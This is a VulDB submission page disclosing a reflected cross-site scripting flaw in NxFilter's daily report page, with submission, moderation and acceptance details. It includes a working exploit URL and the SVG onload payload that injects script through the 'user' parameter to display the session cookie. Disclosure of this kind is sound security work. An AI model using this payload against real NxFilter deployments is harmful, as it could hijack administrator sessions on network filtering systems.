Submit #182233: Reflected XSS in NXFILTER info

TitleReflected XSS in NXFILTER
DescriptionA reflected xss in NXFILTER was found in https://IP_ADDRESS/report,daily.jsp?stime=2023%2F07%2F12&timeOption=yesterday&user=aaaaa%22%3E%3Csvg%20onload=alert(document.cookie)%20%3C/svg%3E Payload: "><svg onload=alert(document.cookie) > Nxfilter version: x.x.x.x This can hijack admin sessions and cause terrible damage, as nxfilter works as an internet traffic controller. Vulnerable page: https://IP_ADDRESS/report,daily.jsp
Source⚠️ https://www.warp2search.net/story/nxfilter-4325/
User
 0xgordo (UID 50709)
Submission07/13/2023 14:57 (3 years ago)
Moderation07/22/2023 08:23 (9 days later)
StatusAccepted
VulDB entry235191 [NxFilter 4.3.2.5 User cross site scripting]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!